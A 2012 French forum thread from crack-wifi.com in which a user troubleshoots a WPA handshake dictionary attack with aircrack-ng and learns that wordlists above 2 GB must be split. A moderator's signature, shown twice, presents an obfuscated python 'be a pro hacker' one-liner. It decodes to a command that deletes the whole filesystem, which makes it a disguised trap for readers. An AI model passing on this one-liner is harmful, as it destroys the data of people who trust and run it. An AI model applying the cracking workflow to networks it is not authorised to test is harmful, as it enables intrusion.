Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 30-01-2012 12:05:32

Sky
Nouveau membre
Inscription : 30-01-2012
Messages : 7

[Résolu]Handshake et dico, ou comment se prendre la tête.

Bonjour à tous,

Je félicite tout d'abord la communauté de faire vivre un forum comme celui-ci, qui partage des connaissances envers tous.

Je me permet de poster ce petit post suite à quelque problème.

Soucieux de comprendre le fonctionnement de ma machine;
Et d'y appliquer les param de ma Box.
Souhaitant me mettre à la place d'un hacker afin de me défendre au mieux je souhaite donc procéder de zéro afin de cracker ma propre clé WPA, vous vous doutez bien...

Ce que j'ai fais :
- J'ai mis ma Wlan0 en root;
- J'ai écouté mon réseau WPA.
- J'ai lancé mon crack et j'ai capturé le Handshake.

Suite à ça; j'ai cherché... cherché... et encore cherché un bon dictionnaire afin de cracker ce handshake.
J'ai fini par en trouver un : http://g0tmi1k.blogspot.com/2011/06/dic … lists.html

J'ai téléchargé celui de 7GO ( pratiquement... ) :
WPA-PSK WORDLIST 3 Final (13 GB)     611419293
(6.8GB / 1.4GB)     Part 1, Part 2, Part 3, Part 4, Part 5, Part 6, Part 7     58747c6dea104a48016a1fbc97942c14

Voila.
Ma commande :
aircrack-ng /root/Desktop/*.cap -w /root/Desktop/WPAKEY.lst
Est bonne car je l'ai testé avec d'autres petits dicos... Cela fonctionne mais la clé n'est pas dedans.

En effet, des dicos de plusieurs MO passent avec cette même commande mais dés que je veux ouvrir mon dico... -w ne trouve pas le dico.

C'est bien dommage, car je pense pouvoir trouver ma clé à l'intérieur de ce dico.

J'ai également pris le tutos de M!ckey , avec son petit programme, et je le félicite au passage pour son partage.

Cependant le fichier Keygen.sh de M!ckey ne veut absolument pas s'éxécuter.

Si quelqu'un a une idée, je suis prenneur. Là j'avoue que je sèche...

Je vous remercie au passage et par avance,

Sky'

Ps: Distribution BT5 ( non live, installé sur partition ) ( Possibilité d'accés Ubuntu + Windows 7 simultanée  )

Dernière modification par Sky (27-03-2012 00:50:27)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 30-01-2012 13:57:49

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : [Résolu]Handshake et dico, ou comment se prendre la tête.

Bonjour !

Es - tu sur d'avoir le dictionnaire comme il faut ? (c'est à dire en plaintext, non compressé )
(je pense que oui, mais on ne sait jamais)

Je ne vois pas d'autres causes que la taille du fichier pour ce problème. Essaye de le découper en morceaux et de le faire petit bout par petit bout non ?


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 30-01-2012 14:49:33

Sky
Nouveau membre
Inscription : 30-01-2012
Messages : 7

Re : [Résolu]Handshake et dico, ou comment se prendre la tête.

Bonjour !

Es - tu sur d'avoir le dictionnaire comme il faut ? (c'est à dire en plaintext, non compressé )
(je pense que oui, mais on ne sait jamais)

Je ne vois pas d'autres causes que la taille du fichier pour ce problème. Essaye de le découper en morceaux et de le faire petit bout par petit bout non ?

Bonjour à toi, spawn.

Je te remercie de ta réponse et de la rapidité de celle-ci.

Pour te répondre à mon tour,
Je te dirai que oui le dico est bien décompréssé, et en plantext.
Je fais coincider les propriétés de plusieurs dicos qui fonctionnent entre eux. Tout est bon.

En effet je ne vois pas d'autres cause que la taille du fichier non plus...

A la base, ce fichier est en 7 parties compréssés.
Mais on ne peut décomprésser une seule partie séparément des 6 autres.

Si le fichier n'en forme qu'un seul et gros... cela devait fonctionné chez l'auteur ?

Hors Ligne

#4 30-01-2012 15:35:10

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : [Résolu]Handshake et dico, ou comment se prendre la tête.

aircrack-ng tout seul ne peut pas travailler avec des dicos de plus de 2 Go.

Hors Ligne

#5 31-01-2012 20:02:32

Sky
Nouveau membre
Inscription : 30-01-2012
Messages : 7

Re : [Résolu]Handshake et dico, ou comment se prendre la tête.

kcdtv a écrit :

aircrack-ng tout seul ne peut pas travailler avec des dicos de plus de 2 Go.


Merci à toi kcdtv;

Je ne savais pas que Aircrack gérait que des fichiers inférieurs à 2go.

J'ai copié le gros fichier Dico sur ma partition Windows.
J'ai téléchargé xtreamSploit, et j'ai divisé en fichier de 1 go ( par sécurité )

J'ai ensuite lancé ma commande et Aircrack est bien en cours de décryptage du Handshake.

Je croise les doigts.

Merci à vous deux !

Hors Ligne

#6 01-02-2012 00:16:07

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : [Résolu]Handshake et dico, ou comment se prendre la tête.

Tu aurais pu utiliser la commande 'split' wink


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#7 01-02-2012 01:32:19

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : [Résolu]Handshake et dico, ou comment se prendre la tête.

kcdtv a écrit :

aircrack-ng tout seul ne peut pas travailler avec des dicos de plus de 2 Go.

J'ai appris un truc là smile


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#8 01-02-2012 01:54:41

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : [Résolu]Handshake et dico, ou comment se prendre la tête.

Ne me dis pas ça que tu me fais douter de moi. tongue
Je viens de regarder sur le site d'aircack-ng et c'est bien ça, maximum 2 GB.

Hors Ligne

#9 10-02-2012 19:22:35

Sky
Nouveau membre
Inscription : 30-01-2012
Messages : 7

Re : [Résolu]Handshake et dico, ou comment se prendre la tête.

En effet, le problème venait bien de la taille du fichier.

J'ai divisé sous windows, vu que "slipt" ne fonctionnait pas.

Malheuresement... rien dans les dictionnaires :s


Merci en tous cas des infos smile

Hors Ligne

#10 10-02-2012 19:50:43

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : [Résolu]Handshake et dico, ou comment se prendre la tête.

Sky a écrit :

J'ai divisé sous windows, vu que "slipt" ne fonctionnait pas.

Tu veux surement parler de

split

roll

Hors Ligne

#11 27-03-2012 00:49:55

Sky
Nouveau membre
Inscription : 30-01-2012
Messages : 7

Re : [Résolu]Handshake et dico, ou comment se prendre la tête.

En effet M1ck3y, fautes d'orthographes...

J'ai donc finalement résolu le problème en découpant sous windows, et transportant les fichiers vers ma partition Backtrack.

Merci à tous ! Je met {Résolu}!

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.024 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]